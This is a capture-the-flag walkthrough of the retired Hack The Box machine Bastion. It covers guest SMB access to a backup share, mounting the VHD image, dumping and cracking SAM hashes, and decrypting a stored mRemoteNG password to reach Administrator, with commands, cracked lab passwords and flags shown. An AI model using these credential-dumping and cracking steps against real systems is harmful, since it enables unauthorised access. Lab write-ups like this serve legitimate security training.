Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Machine Info

Bastion by L4mpje
IP: 10.10.10.134
OS: linux

Recon

Nmap

As usual, we kick off with a Nmap scan.

$ nmap -v -p- -T3 -oN nmap-tcp-allports 10.10.10.134
 Nmap scan report for 10.10.10.134
 Host is up (0.028s latency).
 Not shown: 65522 closed ports
 PORT      STATE SERVICE
 22/tcp    open  ssh
 135/tcp   open  msrpc
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 5985/tcp  open  wsman
 47001/tcp open  winrm
 49664/tcp open  unknown
 49665/tcp open  unknown
 49666/tcp open  unknown
 49667/tcp open  unknown
 49668/tcp open  unknown
 49669/tcp open  unknown
 49670/tcp open  unknown

I run Nmap with the following parameters:

  • -v: run verbose (show more output)
  • -p-: scan all ports, equals 1-65535
  • -T3: run on normal speed (can be omitted, since this is the default speed)
  • -oN nmap-tcp-allports: save output in normal format with said filename
  • 10.10.10.134: host to scan

Note that SSH and SMB are exposed, as well as some other irrelevant services.

SMB

Let’s check out if we can find some open shares.

$ nmap --script smb-enum-shares -p 139,445 10.10.10.134
 Nmap scan report for 10.10.10.134
 Host is up (0.026s latency).
 PORT  STATE SERVICE
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 Host script results:
 | smb-enum-shares: 
 |  account_used: guest
 |  \10.10.10.134\ADMIN$: 
 |   Type: STYPE_DISKTREE_HIDDEN
 |   Comment: Remote Admin
 |   Anonymous access: 
 |   Current user access: 
 |  \10.10.10.134\Backups: 
 |   Type: STYPE_DISKTREE
 |   Comment: 
 |   Anonymous access: 
 |   Current user access: READ
 |  \10.10.10.134\C$: 
 |   Type: STYPE_DISKTREE_HIDDEN
 |   Comment: Default share
 |   Anonymous access: 
 |   Current user access: 
 |  \10.10.10.134\IPC$: 
 |   Type: STYPE_IPC_HIDDEN
 |   Comment: Remote IPC
 |   Anonymous access: 
 |_  Current user access: READ/WRITE

As you can see, the guest account has read access on the Backups share. This sounds like something worth investigating further.

$ sudo smbmap -s Backups -R -H 10.10.10.134 -u guest | tee -a smbmap
 [+] Finding open SMB ports….
 [+] User SMB session establishd on 10.10.10.134…
 [+] IP: 10.10.10.134:445    Name: 10.10.10.134                    
 Disk                         Permissions
 ----                         -----------
 Backups                      READ, WRITE
 [!] Unable to remove test directory at \10.10.10.134\Backups\tzRrGnGVfe, plreae remove manually
 .\
 dr--r--r--        0 Fri Aug 2 11:09:06 2019    .
 dr--r--r--        0 Fri Aug 2 11:09:06 2019    ..
 -r--r--r--       260 Fri Aug 2 11:00:50 2019    nmap-test-file
 -w--w--w--       116 Tue Apr 16 13:43:19 2019    note.txt
 -r--r--r--        0 Fri Feb 22 13:43:28 2019    SDT65CB.tmp
 dr--r--r--        0 Fri Aug 2 11:09:06 2019    tzRrGnGVfe
 dr--r--r--        0 Fri Feb 22 13:44:02 2019    WindowsImageBackup
 [ ... ]
 .\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\
 dr--r--r--        0 Fri Feb 22 13:45:32 2019    .
 dr--r--r--        0 Fri Feb 22 13:45:32 2019    ..
 -r--r--r--        37761024 Fri Feb 22 13:44:03 2019    9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
 -r--r--r--        5418299392 Fri Feb 22 13:45:32 2019    9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
 -r--r--r--       1186 Fri Feb 22 13:45:32 2019    BackupSpecs.xml
 [ ... ]

Opening note.txt, you’ll find another clue on how you may want to continue.

$ smbclient //10.10.10.134/Backups -U guest
smb: > dir
smb: > get note.txt
smb: > exit

$ cat note.txt
 Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

So we want to have a look at the back-ups.

Analysing the back-ups

The small back-up file ‘9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd’ is a recovery image, which Windows usually creates when you create a back-up image.

The interesting image however is ‘9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd’. As the note said, downloading this file might fail. In my case I was never able to download more than 75% of the vhd using the get command in smbclient.

What worked for me is adding the share as a remote disk and using rsync to copy the image to my system (as rsync allows you to continue failed downloads) for analysis.
However, there are tools available which’ll allow you to browse through an image without having to download the whole image to your disk.

$ sudo mkdir /mnt/vhd
$ sudo mount -t cifs -o user=guest //10.10.10.134/Backups /mnt/vhd/
$ cd /mnt/vhd/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/
$ rsync --append 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd ~/Documents/Projects/HackTheBox_eu/134-Bastion/
$ sudo umount /mnt/vhd
$ cd  ~/Documents/Projects/HackTheBox_eu/134-Bastion/
$ sudo vhdimount 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd /mnt/vhd/
$ cd /mnt/vhd/
$ ls
$ mmls -aB vhdi1
 DOS Partition Table
 Offset Sector: 0
 Units are in 512-byte sectors
 Slot   Start    End     Length    Size  Description
 002: 000:000  0000000128  0031248511  0031248384  0014G  NTFS / exFAT (0x07)
$ echo 128*512 | bc
 65536
$ sudo mkdir /mnt/dd
$ sudo mount -o ro,noload,offset=65536 -t nfts vhdi1 /mnt/dd

We can now browse through the contents of the image.

Cracking hashes

I start of by looking for password hashes.
These can be retrieved by cracking the SAM (Security Account Manager) file, which is located at C:\Windows\System32\config.

$ cd /mnt/dd/Windows/System32/config/
$ samdump2 SYSTEM SAM > ~/Documents/Projects/HackTheBox_eu/134-Bastion/hashes.txt
$ cat ~/Documents/Projects/HackTheBox_eu/134-Bastion/hashes.txt
 *disabled * Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

$ hashcat -m 1000 -a 0 SAM-hashes.txt
$ cat ~/.hashcat/hashcat.potfile
 26112010952d963c8dc4217daec986d9:bureaulampje

We now have the password of the user L4mpje (“lampje” = “small lightbulb” in Dutch), which is bureaulampje (“small desk lamp” in Dutch).

$ Got the user flag

I use this password to SSH onto the box and find the users.txt file containing the flag on the user’s desktop.

$ ssh L4mpje@10.10.10.134 # enter password bureaulampje
L4mpje@BASTION C:\Users\L4mpje> type C:\Users\L4mpje\Desktop\users.txt
 9bfe57d5c3309db3a151772f9d86c6cd

# Going for the root flag

While browsing through the filesystem, I noticed mRemoteNG was installed.
This is also confirmed by running this small line of PowerShell:

L4mpje@BASTION C:\Users\L4mpje\Downloads> powershell
PS C:\Users\L4mpje\Downloads> Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize

DisplayName                                                    DisplayVersion Publisher                InstallDate              
-----------                                                    -------------- ---------                -----------              
mRemoteNG                                                      1.76.11.40527  Next Generation Software 20190222                 
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161 Microsoft Corporation    20190416

Searching for vulnerabilities on exploit-db didn’t reveal anything, but a quick Google search did bring me to an interesting Reddit post.
The Ruby script in the post didn’t seem to work for me, but I finally found a Python script on GitHub which did.

I downloaded confCons.xml from the host and ran the script to find the password for the Administrator account. I then logged in onto the hosting using the Administrator password to retrieve the flag from the Administrator’s desktop.

$ scp -T L4mpje@10.10.10.134:"C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml" ./
$ cat confCons.xml
$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
 Password: thXLHM96BeKL0ER2

$ ssh Administrator@10.10.10.134
administrator@BASTION C:\Users\Administrator> type Desktop\root.txt
 958850b91811676ed6620a9c430e65c8

Whatever you are, be a good one.
~ Abraham Lincoln